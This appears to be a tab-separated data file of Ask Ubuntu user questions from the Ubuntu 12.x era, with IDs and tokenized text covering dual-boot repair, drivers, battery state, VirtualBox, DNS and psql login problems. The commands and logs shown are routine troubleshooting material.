217889	multitouch gestures	i wanted to know how i could configure multi-touch gestures in ubuntu . in windows i can do this using the synaptics driver software . i have already used synclient to configure the taps , palmdetect , scroll , etc . i now want gesture support . is is possible even ? system-info : ubuntu 12.10 , synaptics clickpad
217891	can i reinstall windows 7 without touching my existing dual boot ubuntu installation ?	i have dual boot configured with windows 7 ( 32bit ) and ubuntu 12.04 ( 64bit ) . i installed ubuntu after windows , now my windows is corrupt due to some virus and i need to reinstall it . currently when i start my pc , grub loader comes up and i need to select ubuntu or windows . i was wondering how can i install windows again and still have my ubuntu install ? is there a way to do this ? i do not want to install ubuntu again and lose my settings and data there . thanks , ketan
217892	how to copy the file from source to destination only once at a time ?	i have to copy the file from my desktop to my mounted directory . i was using the following command to copy the file from my desktop to mounted directory . os.system ( `` cp -f /home/desktop/filename /media/folder_1 '' ) . it works fine . but the problem is while copying the file from my source to mounted directory ( folder_1 ) if any interruption is happens like network down , then the system continuously keep on trying . it could n't skip that process . finally , when the network comes the files are again copy to my mounted directory . due to this continuous trying , next time i try to move the content it throws `` permission denied '' error . how do i copy the file only once , if any network issues happen then it will not keep try to copy , instead of that , it throws the error . if you know , let me . its very useful to me .
217893	how to delete a non-empty directory in terminal ?	how do i delete the following directory ? i typed : rmdir lampp this error comes up : rmdir : failed to remove `lampp ' : directory not empty is there a command to delete all the files in the directory and delete the directory folder ?
217895	the battery indicator & power setting panel shows wrong battery state	my laptop is thinkpad e420 with ubuntu 12.04 64-bit installed , the kernel version is 3.2.0-33-generic . i have set the battery threshold as 60 % via windows7 . it seems that the threshold auto effected in ubuntu . however , there are some problems of the battery indicator 's state . i 'll list some information of the battery state as following : ( note that in terminal ubuntu says that battery charging state is charged , while the power setting panel shows that the battery state is charging as well as the battery indicator shows . ) $ cat /proc/acpi/battery/bat0/state present : yes capacity state : ok *charging state : charged* present rate : 0 mw remaining capacity : 18200 mwh present voltage : 16103 mv battery indicator state power setting panel is there any way to fix the problem ? edit add some result via *sudo fwts battery - > battery.log * 3 passed , 4 failed , 0 warnings , 0 aborted , 0 skipped , 0 info only . test failure summary =============================== critical failures : none high failures : 2 battery : did not detect any acpi battery events . battery : could not detect acpi events for battery bat0 . medium failures : 1 battery : battery bat0 claims it 's charging but no charge is added low failures : 1 battery : system firmware may not support cycle count interface or it reports it incorrectly for battery bat0 . other failures : none test |pass |fail |abort|warn |skip |info | -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ battery | 3| 4| | | | | -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ total : | 3| 4| 0| 0| 0| 0| -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ edit2 according to @ colin ian king 's suggestion , i have run following script . $ cat /sys/class/power_supply/bat0/uevent power_supply_name=bat0 power_supply_status=unknown power_supply_present=1 power_supply_technology=li-ion power_supply_cycle_count=0 power_supply_voltage_min_design=14400000 power_supply_voltage_now=16075000 power_supply_power_now=0 power_supply_energy_full_design=31680000 power_supply_energy_full=22050000 power_supply_energy_now=17860000 power_supply_model_name=lnv-42t4763 power_supply_manufacturer=sanyo power_supply_serial_number= 2614 i have taken two photos of the bios in case i have missed something . the output of acpi -v future $ acpi -v battery 0 : unknown , 89 % battery 0 : design capacity 1947 mah , last full capacity 1339 mah = 68 % adapter 0 : on-line thermal 0 : ok , 31.0 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 120.0 degrees c cooling 0 : lcd 3 of 15 cooling 1 : lcd 3 of 15 cooling 2 : processor 0 of 10 cooling 3 : processor 0 of 10 cooling 4 : processor 0 of 10 cooling 5 : processor 0 of 10 any help would be appreciated !
217900	dual monitors do n't initialise correctly in booting - 12.10	i have just upgraded from 12.04 to 12.10 ( was actually a fresh install with the home partition kept and '/ ' wiped ) . i am attempting to make my laptop monitor ( hp dv6 ) and my samsung bx2450 monitor work together successfully without the nvidia package ( 12.04 and down needed these just to detect the extra model ) . i am met with the following inconsistencies and do n't really know how to go about finding the problem and fixing these : when i plug the monitor in when already logged in , it works perfectly with the settings configured in system settings - > displays when i plug the monitor in for the first time at the log in screen ( from a fresh boot - i.e . without the monitor having been inserted at any time in the boot process ) , it once again works perfectly when i boot with the monitor plugged in ( or have it plugged in before the initial log in screen ) the login screen is entered with my laptop display normal and my monitor has just a mirrored ( without any resizing ) display of my laptop screen ( only takes up like 80 % of the monitor screen ) . this is in contrast to my monitor settings which are to not mirror when i login , both monitors go black , then the main display ( my laptop ) does the log in ( displays the unity launcher with that 'white-ish flash ' . after this point erratic things happen . both screens completely freeze ( my extra monitor stays black ) , my laptop screen goes like the picture in this question , etc the system is completely frozen and i have to hard reboot ( sometimes after a few minutes a black screen has come up with a random page full of hex numbers ) can anyone offer me any suggestions as to how to get this working ( i would really rather not install nvidia settings as i prefer unity successfully recognising my system as two screens ) ? i am not sure if there could be remnants of my old nvidia settings on my home partition somewhere or if i need to configure something ? thanks
217902	error trying to install openoffice or libreoffice after removing openoffice	i removed openoffice with isuru @ isuru-desktop : ~ $ sudo apt-get purge `` openoffice* '' now when i try to install libreoffice i get following error please help me to install libreoffice on my computer . im om ubuntu 10.04
217904	unable to boot into windows after installing ubuntu , how to fix ?	i first installed windows 8 and then i installed ubuntu 12.10 . now i`m unable to boot windows 8 . how to fix this grub ?
217907	can gradequick web run in ubuntu ?	i am trying to run this grade book in ubuntu 12.10 , but can not find a way to make it compatible . i have checked the web for answers , but can not find a solution , and there does not seem to be any information in the askubuntu database . can anyone tell me if they have a solution ?
217908	ubuntu integrated graphics suspend + hybrid graphics	my laptop uses a hybrid graphics hardware . using the vgaswitcheroo i am able to power off either card and switch between them correctly . the issue is that the system wakes up/resumes from suspend correctly only when using the discrete graphics , or atleast the discrete graphics must be powered on even if the display is connected to the onboard intel card . has anyone faced this issues ? is there any workaround ? i only want to use the integrated card and not the discrete amd card . system info intel hd 3000 ati mobility radeon hd 7600m ubuntu 12.10
217912	login as non-root user in terminal	this is a question that i would expect to quickly get an answer from google . however somehow google is failing me . let 's assume i 'm logged in to a terminal session and i would like temporarily work as another non-root user whose password i know without leaving my session . when logged as this user i want the home directory , etc , for this user set up correctly until i log out . how do i do that ? i tried su -- username and then keying in the password , it did not produce any error but i saw no visible changes of the command prompt it would still say myname @ myhost . the home directory also was that of myname and not the new login i tried to login as . i 'm - as it 's apparent now - quite inexperienced in linux/ubuntu , so any info is welcome .
217919	installing netgear wireless adapter -	i am having the hardest time getting my wireless adapter working on my pc . i actually got it working thanks to the help of another thread ( http : //ubuntuforums.org/showthread.php ? t=1964173 & page=2 ) and a video on the subject ( http : //www.youtube.com/watch ? v=v0ist9aekeg & feature=g-hist ) but the wireless adapter quit working after a couple days and i seem to be back at square one , only worse . i 've uninstalled ubuntu and reinstalled it completely and tried the exact same method that got it working before but i keep failing at the same spot . a little background : my ubuntu is on a wubi install i 'm using a netgear wnda 3100 v2 wireless adapter i 've already installed ndiswrapper and have the appropriate .inf and .sys files for the wireless driver . i 'm semi-new to linux but know my way around a terminal just fine . i follow the two tutorials that i mentioned above to a t and everything goes well until i type this command : sudo modprobe ndiswrapper the result of that command returns : killed which did not happen the first time . the first time it returned nothing . but the real kicker is when i enter dmesg | grep ndis i get this bad boy : [ 179.416769 ] ndiswrapper version 1.55 loaded ( smp=yes , preempt=no ) [ 179.731229 ] ndiswrapper ( link_pe_images:575 ) : fixing ki_user_shared_data address in the driver [ 179.735417 ] ndiswrapper : driver bcmn43xx64 ( ,08/26/2009 , 5.10.79.30 ) loaded [ 179.738211 ] ip : [ < ffffffffa02ceae9 > ] usbd_interfaceisdevicehighspeed+0x9/0x20 [ ndiswrapper ] [ 179.738300 ] modules linked in : ndiswrapper ( + ) nls_iso8859_1 nls_cp437 vfat fat snd_hda_codec_realtek binfmt_misc ppdev fbcon tileblit font bitblit softcursor vga16fb vgastate snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device nouveau ttm drm_kms_helper snd psmouse edac_core serio_raw edac_mce_amd drm i2c_algo_bit soundcore snd_page_alloc lp parport i2c_nforce2 usbhid hid usb_storage sata_nv forcedeth [ 179.738386 ] rip : 0010 : [ < ffffffffa02ceae9 > ] [ < ffffffffa02ceae9 > ] usbd_interfaceisdevicehighspeed+0x9/0x20 [ ndiswrapper ] [ 179.738574 ] [ < ffffffffa02bc2aa > ] ? ndisallocatememorywithtag+0x1a/0x40 [ ndiswrapper ] [ 179.738619 ] [ < ffffffffa02cec70 > ] ? usbd_interfacereference+0x0/0x30 [ ndiswrapper ] [ 179.738664 ] [ < ffffffffa02cec40 > ] ? usbd_interfacedereference+0x0/0x30 [ ndiswrapper ] [ 179.738709 ] [ < ffffffffa02ceaa0 > ] ? usbd_interfacegetusbdiversion+0x0/0x40 [ ndiswrapper ] [ 179.738754 ] [ < ffffffffa02cf1c0 > ] ? usbd_interfacequerybustime+0x0/0x30 [ ndiswrapper ] [ 179.738799 ] [ < ffffffffa02cec10 > ] ? usbd_interfacesubmitisoouturb+0x0/0x30 [ ndiswrapper ] [ 179.738844 ] [ < ffffffffa02cebe0 > ] ? usbd_interfacequerybusinformation+0x0/0x30 [ ndiswrapper ] [ 179.738888 ] [ < ffffffffa02ceae0 > ] ? usbd_interfaceisdevicehighspeed+0x0/0x20 [ ndiswrapper ] [ 179.738932 ] [ < ffffffffa02c152c > ] ? exallocatepoolwithtag+0x3c/0x80 [ ndiswrapper ] [ 179.738978 ] [ < ffffffffa02d072b > ] ? win2lin3+0x11/0x14 [ ndiswrapper ] [ 179.739034 ] [ < ffffffffa02cc90f > ] ? mp_init+0x6f/0x200 [ ndiswrapper ] [ 179.739079 ] [ < ffffffffa02c6cd2 > ] ? pdodispatchpnp+0x42/0x100 [ ndiswrapper ] [ 179.739123 ] [ < ffffffffa02cde5c > ] ? ndis_start_device+0x2c/0x8b0 [ ndiswrapper ] [ 179.739166 ] [ < ffffffffa02c3dfd > ] ? iofcalldriver+0x6d/0xd0 [ ndiswrapper ] [ 179.739220 ] [ < ffffffffa02c3dd1 > ] ? iofcalldriver+0x41/0xd0 [ ndiswrapper ] [ 179.739263 ] [ < ffffffffa02c43b6 > ] ? iosyncforwardirp+0x96/0xd0 [ ndiswrapper ] [ 179.739308 ] [ < ffffffffa02ce783 > ] ? ndisdispatchpnp+0xa3/0x150 [ ndiswrapper ] [ 179.739353 ] [ < ffffffffa02d0717 > ] ? win2lin2+0xe/0x11 [ ndiswrapper ] [ 179.739396 ] [ < ffffffffa02c3dd1 > ] ? iofcalldriver+0x41/0xd0 [ ndiswrapper ] [ 179.739438 ] [ < ffffffffa02c3dfd > ] ? iofcalldriver+0x6d/0xd0 [ ndiswrapper ] [ 179.739489 ] [ < ffffffffa02c3dd1 > ] ? iofcalldriver+0x41/0xd0 [ ndiswrapper ] [ 179.739532 ] [ < ffffffffa02c5dad > ] ? iosendirptopdev+0xdd/0x130 [ ndiswrapper ] [ 179.739583 ] [ < ffffffffa02c3c18 > ] ? ioattachdevicetodevicestack+0x68/0x80 [ ndiswrapper ] [ 179.739627 ] [ < ffffffffa02c61ac > ] ? pnp_start_device+0x4c/0x90 [ ndiswrapper ] [ 179.739671 ] [ < ffffffffa02c6479 > ] ? wrap_pnp_start_device+0xf9/0x180 [ ndiswrapper ] [ 179.739715 ] [ < ffffffffa02c65f1 > ] ? wrap_pnp_start_usb_device+0xf1/0x120 [ ndiswrapper ] [ 179.739852 ] [ < ffffffffa02f1000 > ] ? wrapper_init+0x0/0xb0 [ ndiswrapper ] [ 179.739888 ] [ < ffffffffa02b7e4f > ] ? loader_init+0xcf/0x160 [ ndiswrapper ] [ 179.739920 ] [ < ffffffffa02f107b > ] ? wrapper_init+0x7b/0xb0 [ ndiswrapper ] [ 179.740020 ] rip [ < ffffffffa02ceae9 > ] usbd_interfaceisdevicehighspeed+0x9/0x20 [ ndiswrapper ] after i run that command , anything to do with ndiswrapper pretty much sends me into an infinite loop . like , for example , ndiswrapper -lnever returns anything . does anybody have any idea why ? ? i think it might be a blacklist issue but it 's my understanding that i would only have to blacklist a built-in wireless driver . is that right ? what am i doing wrong ? and what can i do to fix it ? any help would be very much appreciated . update - more information uname -rp compaq @ ubuntu : ~ $ uname -rp 2.6.32-38-generic unknown entering lsusb sends me into an infinite loop . compaq @ ubuntu : ~ $ lsusb before i install ndiswrapper and run sudo modprobe ndiswrapper lsusb works fine . i remember it does list my netgear , inc device and gives me 0846:9011 .
217927	max file size can recover on ext4	is there a limitation for recovering big files on ext4 like ntfs ( 4 giga max )
217928	how can i change the settings in crafty ( chess engine )	i use xboard as a gui for crafty , being crafty a state of the art chess engine i do n't want to use anything else , but it floods my home directory with game.nnn and log.nnn files . i would like to change the settings and have crafty to save this files to a `` folder1 '' instead of my home directory .
217929	how to install vanilla version of firefox on ubuntu ?	i get daily crashes with firefox on ubuntu . almost every time i start ubuntu and then try to launch firefox , it causes x to crash out immediately . sometimes i have to log in three or four times before firefox actually loads . these crashes are obviously causing me to lose any work i have n't saved in other apps . as you can imagine , that is a tad frustrating . i suspect the crashes might be something to do with the flash side of things because sometimes when i try to visit a website with flash content such as bbc iplayer , the dreaded black screen of death appears instantly . i know that ubuntu makes modifications to mozilla 's version of firefox , so i wondered if i could try running a plain mozilla version of firefox without modifications to see if that would work . could anyone tell me how to achieve this ?
217930	formating 500giga hard disk	i planning to buy a new labtop 500giga hard-disk no system , and was thinking to setup windows xp on drive c : 50g for windows and 50 for ubuntu file system . my question should i make one volume for the rest 400g or make 4 volumes 100 each ? another question : i 'm planning to encrypt all my files , but do n't know if i made one 400g volume should encrypt all of it with true crypt or better make containers on it , and how big should the containers be 50giga each or 100giga to get best performance . thanks
217937	how to install amd drivers correctly ?	i recently installed ati drivers from the ubuntu repository but after the installation when i try to open ati catalyst control center . i get a message that ati drivers are not properly installed or there is a problem with the hardware . similar problem was faced by a friend of mine . on his laptop mint worked smoothly but the drivers for ati were not installed correctly .
217939	i can not find my app in ubuntu software center	just now i published my app in ubuntu software center and the status got changed from `` ready to publish '' to `` published '' and a mail has also come stating that my app has successfully been published . but when i searched my app in search bar , i could n't find my app . details of my app are below . app name : knight 's tour submitted as : knight_tour.jar kindly help me
217946	aspire one 722 frequently starts with illuminated black screen ( 64 bit )	i installed ubuntu 12.04 and now updated to 12.10 ( 64 bit ) on acer aspire one 722 's in a whole class in school . at my own and some of the pupils computers we have boot problems : the computers start normally , since they stop with a `` bright black '' ( screen is obviously turned on but black ) screen . the only solution is to shut off power and re-boot ( mostly for one more time , sometimes two or more times until it starts normally ) . i did n't install any third-party-graphics-drivers . can anyone help me with my problem ?
217949	no other users can access external hdd since upgrade to 12.10	since upgrading to ubuntu 12.10 no other user can access the external hdd . this is awkward as its a family pc and we use the hdd to store music and save backups across the several accounts . the external hdd seems to mount just to my account now , i.e . /media/ [ user1 ] / [ ext hdd ] , and while all the other users can see the drive mounted they can not access as they just receive a file location error . from their perspective it is mounted just in my profile and not in theirs . i have tried editing the properties of the hdd to allow others to view and create files on the hdd but that has not changed anything . i have also read that this is a new feature to ubuntu 12.10 , the way it mounts via /media/ [ user ] / . so is there a way to have it mount to all the other user accounts too ? thanks !
217951	install eclipse classic 4.2.1 in ubuntu 10,04	i download eclipse classic 4.2.1 from http : //www.eclipse.org/downloads/ and it is not .deb , it is .tar.gz . how can i install this package ? ?
217954	copying to ntfs from ubuntu slower than ext4 - why ?	is copying to ext4 faster than copying to ntfs , because i was making new containers today on ext4 speed was 45mb on ntfs same container size speed 14mb , both containers where madden from ubuntu with truecrypt 7.0 , is there difference in coping speed between ext4 and ntfs , or ubuntu handle copying to ntfs slower ?
217962	is it possible to set up a second monitor/display that does n't change when switching desktop on your main with unity 's desktop wall ?	is it possible to set up a second monitor/display that does n't change when switching desktop on your main with unity 's desktop wall ? this is possible with the gnome3-desktop , but i ca n't switch over to that interface . why would i want one display to remain static ? its nice to always have a chat window or video stream playing whilst you are actually working on the other monitor . please let me know any workarounds/ideas/solutions . thanks in advance .
217964	desktop shows a combination of gnome 2 and gnome 3 elements	i have upgraded to ubuntu 12.10 from ubuntu 12.04 . i had gnome shell installed in ubuntu 12.04 . after the upgrade , my desktop appears to be a mix of gnome 2 and gnome 3 elements . have attached the screenshot . what should i do ? by the way the version of my gnome shell is 3.6.1 here 's the .xsession-error file generated on my machine after login . openconnection : connect : no such file or directory can not connect to brltty at :0 x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 138 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 15 current serial number in output stream : 15 gnome-session-check-accelerated : helper exited with code 256 gnome-session [ 3355 ] : warning : session 'gnome ' runnable check failed : child process exited with code 1 ( gnome-settings-daemon:3439 ) : color-plugin-warning ** : failed to get edid : unable to get edid for output window manager warning : can not bind `` switch-panels '' to control_l : it needs a modifier such as ctrl or alt . ( gnome-settings-daemon:3439 ) : color-plugin-warning ** : unable to get edid for xrandr-lvds : unable to get edid for output ( gnome-panel:3455 ) : gtk-critical ** : gtk_accelerator_parse_with_keycode : assertion `accelerator ! = null' failed ** ( gnome-panel:3455 ) : warning ** : unable to parse mouse modifier ' ( null ) ' mouse-plugin-message : checking on device synps/2 synaptics touchpad mouse-plugin-message : checking on device at translated set 2 keyboard mouse-plugin-message : checking on device logitech usb optical mouse mouse-plugin-message : checking on device uvc camera ( 05ca:183e ) mouse-plugin-message : checking on device power button mouse-plugin-message : checking on device video bus mouse-plugin-message : checking on device sony vaio keys mouse-plugin-message : checking on device virtual core xtest keyboard mouse-plugin-message : checking on device virtual core xtest pointer mouse-plugin-message : checking on device synps/2 synaptics touchpad mouse-plugin-message : checking on device at translated set 2 keyboard mouse-plugin-message : checking on device logitech usb optical mouse mouse-plugin-message : checking on device uvc camera ( 05ca:183e ) mouse-plugin-message : checking on device power button mouse-plugin-message : checking on device video bus mouse-plugin-message : checking on device sony vaio keys mouse-plugin-message : checking on device virtual core xtest keyboard mouse-plugin-message : checking on device virtual core xtest pointer mouse-plugin-message : checking on device synps/2 synaptics touchpad mouse-plugin-message : checking on device at translated set 2 keyboard mouse-plugin-message : checking on device logitech usb optical mouse mouse-plugin-message : checking on device uvc camera ( 05ca:183e ) mouse-plugin-message : checking on device power button mouse-plugin-message : checking on device video bus mouse-plugin-message : checking on device sony vaio keys mouse-plugin-message : checking on device virtual core xtest keyboard mouse-plugin-message : checking on device virtual core xtest pointer mouse-plugin-message : checking on device synps/2 synaptics touchpad mouse-plugin-message : checking on device at translated set 2 keyboard mouse-plugin-message : checking on device logitech usb optical mouse mouse-plugin-message : checking on device uvc camera ( 05ca:183e ) mouse-plugin-message : checking on device power button mouse-plugin-message : checking on device video bus mouse-plugin-message : checking on device sony vaio keys mouse-plugin-message : checking on device virtual core xtest keyboard mouse-plugin-message : checking on device virtual core xtest pointer mouse-plugin-message : checking on device synps/2 synaptics touchpad mouse-plugin-message : checking on device at translated set 2 keyboard mouse-plugin-message : checking on device logitech usb optical mouse mouse-plugin-message : checking on device uvc camera ( 05ca:183e ) mouse-plugin-message : checking on device power button mouse-plugin-message : checking on device video bus mouse-plugin-message : checking on device sony vaio keys mouse-plugin-message : checking on device virtual core xtest keyboard mouse-plugin-message : checking on device virtual core xtest pointer mouse-plugin-message : checking on device synps/2 synaptics touchpad ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device at translated set 2 keyboard ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device logitech usb optical mouse ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device uvc camera ( 05ca:183e ) ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device power button ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device video bus ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device sony vaio keys ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device virtual core xtest keyboard ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device virtual core xtest pointer ( gnome-settings-daemon:3439 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed mouse-plugin-message : checking on device synps/2 synaptics touchpad mouse-plugin-message : checking on device at translated set 2 keyboard mouse-plugin-message : checking on device logitech usb optical mouse mouse-plugin-message : checking on device uvc camera ( 05ca:183e ) mouse-plugin-message : checking on device power button mouse-plugin-message : checking on device video bus mouse-plugin-message : checking on device sony vaio keys mouse-plugin-message : checking on device virtual core xtest keyboard mouse-plugin-message : checking on device virtual core xtest pointer ( gnome-panel:3455 ) : gtk-critical ** : gtk_accelerator_parse_with_keycode : assertion `accelerator ! = null' failed ** ( gnome-panel:3455 ) : warning ** : unable to parse mouse modifier ' ( null ) ' ** message : applet now removed from the notification area ** message : using fallback from indicator to gtkstatusicon ** ( gnome-settings-daemon:3439 ) : critical ** : setup_bg : assertion `manager- > priv- > bg == null ' failed ( gnome-panel:3455 ) : glib-gobject-warning * : /build/buildd/glib2.0-2.34.0/./gobject/gsignal.c:2459 : signal size_request ' is invalid for instance0x8e5ac50' * message : applet now embedded in the notification area nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing .
217967	gnome 's file v3.6.2 ( nautilus ) has lost the inline folder expand function	i just update to current gnome 3.6 . so this will also bring an redesigned file app ( nautilus ) . in the listview i miss the folder expand icon to expand the folder inline . with double click of course a new will be opened . has anyone an idea how to activate the inline expand feature ? maybe it 's lost in the redesign .
217972	virtualbox does not run : ns_error_failure	here is ubuntu 12.10 virtual-box is somehow not working : i was trying to install win7 on to an usb-hard-disk . boinc is switched off and ram-size is set to 4096 mb ( too big ? of possible 8 gibi ) report of virtual-box is : the com-object for virtualbox could not be created . the application is now ended . start tag expected , ' & lt ; ' not found . location : '/home/ $ user/.virtualbox/virtualbox.xml ' , line 1 ( 0 ) , column 1 . /build/buildd/virtualbox-4.1.18-dfsg/src/vbox/main/src-server/virtualboximpl.cpp [ 484 ] ( nsresult virtualbox : :init ( ) ) . fehlercode : ns_error_failure ( 0x80004005 ) komponente : virtualbox interface : ivirtualbox { c28be65f-1a8f-43b4-81f1-eb60cb516e66 } comment of me : why is virtualbox installing xml into folder of $ user in .virtualbox ? should it not be on usb-harddisk ? ( with 500 gibi ) first installation attempt was breaking off ( with win7 in 64bit ) should i try virtual-box ( ubuntu 64bit ) with win7 in 32bit ? should i leave ram-size of virtual-box to default 512 mb ? thanks for reply
217973	error when using `` sudo nautilus '' , how do i solve it ?	here is the terminal log . http : //pastebin.com/xtek13b7 how do i fix it ? what does it do ? is it safe or okay ?
217976	gksudo fails with critical error	i am trying to run gksudo . this is my second day as a linux user . yesterday i could do gksudo gedit and input my root password fine . today , when i run that , the gui comes up and asked for my password , however then the program fails to run and all i get is : ( gksudo:3262 ) : glib-critical ** : g_str_has_prefix : assertion `str ! = null ' failed i can not sudo , i can not su , i ca n't do anything . i am trying to add myself to the sudoers file but i ca n't even view it without being root . what can i do ?
217981	how to install and run unetbootin ?	strangely , but true , you can not install from the the original site , or run it . so how to install and run unetbootin ?
217983	how to connect ubuntu 12.04 client to ubuntu 12.10 server if both installed inside virtual box ?	i installed virtual box4.1.18 version in windows 8 . inside virtual box i configured ftp ubuntu server 12.10 and installed ubuntu desktop 12.04 with filezilla . now i cant able to connect ubuntu client to the server in the virtual box . please note both server and client os are inside the virtual box .
217986	how to change the cursor in unity , oxygen theme ?	how do i change the cursor of the theme ?
217988	system will not resolve domain.local websites	i have done a brand new installation of the ubuntu server ( v12.10 ) with bind configured to have a dns zone of gdos.local and apache configured for said domain . with a brand new installation of ubuntu desktop lts i try to connect to www.gdos.local and all i get is : server not found firefox ca n't find the server at www.gdos.local . check the address for typing errors such as ww.example.com instead of www.example.com however if i change the domain to gdos.tmp and type in www.gdos.tmp , i get the internal website . if i change it to mybusiness.local , i get the same error message . if i use a microsoft os , this works fine , all three domains resolve to a webpage . i have searched the internet flat for the past week on dns issues but have not come up with a solution . i have followed instructions from removing dnsmasq to editing like resolv.conf ( in some very strange places ) and i still have no joy on getting the .local domain extension to work . i can safely say the issue is not with the server but with the desktops because if the issue was server related the microsoft os 's would not resolve it either . i have done several installs of the desktop in an effort to make sure that i did not break anything while trying to fix this . please can anyone point to a workable solution for fixing the .local domain extension .
217993	watch the file changes in ubuntu	i 'm worried about my windows apps modifying the files in ubuntu , as there is software in windows that can see and can modify files on the linux partition . can files or applications run normally in ubuntu after modifying ? if so , how can i watch the files for changes in ubuntu ?
217997	oracle java -version does n't work	i 've installed java by following this instruction and also had installed java 7 from elsewhere but i ca n't seem to get it to work.. every time i type in java -version via terminal ( i am ssh-ing to an ubuntu server ) i get this : root @ ip- ( ... ) : / # java -version bash : /usr/local/bin/java : no such file or directory this is my path variable : root @ ip- ( ... ) : / # echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /root/bin : /usr/local/java/jre1.7.0_09/bin : /root/bin : /usr/local/java/jre1.7.0_09/bin the path variable has two mentions of jre/bin but apart from that i do n't see anything strange ( and this was because i installed it twice ? - but either way , it should n't matter ) so how do i debug why my java -version returns no such file or directory error when i can clearly see that the directory does have java in it ? i do n't know what other info i need to provide since i am a ubuntu beginner , but please ask if you need anything else .
218009	how to make psql to default to localhost ?	i have the following scenario : saji @ geeklap : ~ $ psql -u postgres psql : fatal : ident authentication failed for user `` postgres '' saji @ geeklap : ~ $ psql -h localhost -u postgres password for user postgres : psql ( 8.4.14 ) ssl connection ( cipher : dhe-rsa-aes256-sha , bits : 256 ) type `` help '' for help . postgres= # i 'm trying to log into the postgresql server installed in my system as user postgres . i 'm able to login only if i specify -h localhost . whereas psql documentation says that : if you omit the host name , psql will connect via a unix-domain socket to a server on the local host , or via tcp/ip to localhost on machines that do n't have unix-domain sockets . ref : http : //www.postgresql.org/docs/current/static/app-psql.html # r2-app-psql-con why am i unable to login without specifying the host , is there some configuration file that needs any change for things to occur as told in the psql documentation ?
218011	try ubuntu - where does it store my files ?	i am wondering , when you select the option of just `` try ubuntu '' instead of installing , where does ubuntu store the files that you download / copy / save ? i right click in the home folder , and it specified i had 4gb free space . where did it get this 4gb space from , and if i transition to another os system , how can i access or delete all the previous data from the session of `` try ubuntu '' ? thank you !
218012	brightness problem gradually changing at every restart	i am using ubuntu 12.10 . whenever i restart my laptop my system brightness is changing.what settings should i make so that brightness does n't change on every restart
218013	home server power consumption reduction	i am running ubuntu server 12.04 on an hp mini 311 . it has an atom 270 , 3gb ram , nvidia ion graphics . when running windows 7 with the screen off and no programs running the power consumtion from the wall was measured as 7-9w . with ubuntu server running , with acpi , powertop options good . the power consumption is 17-20w . powertop reports that speedstep is clocking the cpu at 800mhz instead of the max 1600mhz and that the cpu is idling at least 95 % . what other optimizations does windows do that i can also customize to bring the power consumption down to a minimum ? some other details : power consumption is key , but i have no problem with the laptop at full power when i am actually running tasks . i am suspicious that the gpu , even though powertop reports it at 0 % usage , is in some non optimized state . i have not installed any nvidia drivers . the bios has a switch enabled to allow the fan to turn off when consumption is low . the fan turns off if running winxp and idling but is usually running in win 7 .
218016	basic & most useful gnome-shell shortcuts	may i know what are the main and best useful gnome-shell short-cut keys ? i want them to switch the windows and select workspaces etc .
218017	filesystem bug horror !	i believe i have fallen victim to a bad ext4 filesystem bug . i woke up this morning to boot my computer and realized it stalled with a bunch of graphical errors . it reported an i/o error on sda1 repeatedly . this is a 500gb scorpio blue hdd ( about a month old ) that has been running perfectly until shortly after installing ubuntu 12.10 from my disk ( fresh install ) . i first tried to fix the complaint of a bad or corrupt grub configuration from the recovery menu but it did n't do anything . so then i popped in my ubuntu ready installer ( usb flashdrive ) and i was unable to format the filesystem , it had an output of asking drive if cache failed or something and eventually said that the filesystem could n't be created . i went ahead and popped in my windows 7 dvd and it formatted it without any issues , and i am now standing on ubuntu 12.04 in working order . note : ubuntu 12.10 had all of its updates installed and had various apps like vlc , smplayer , wine , and various other typical things . i know this is n't exactly a `` question '' but launchpad is a bit confusing to use and never seems to get appointed correctly for me . so i 'd rather seek out to a community i know is active and alert .
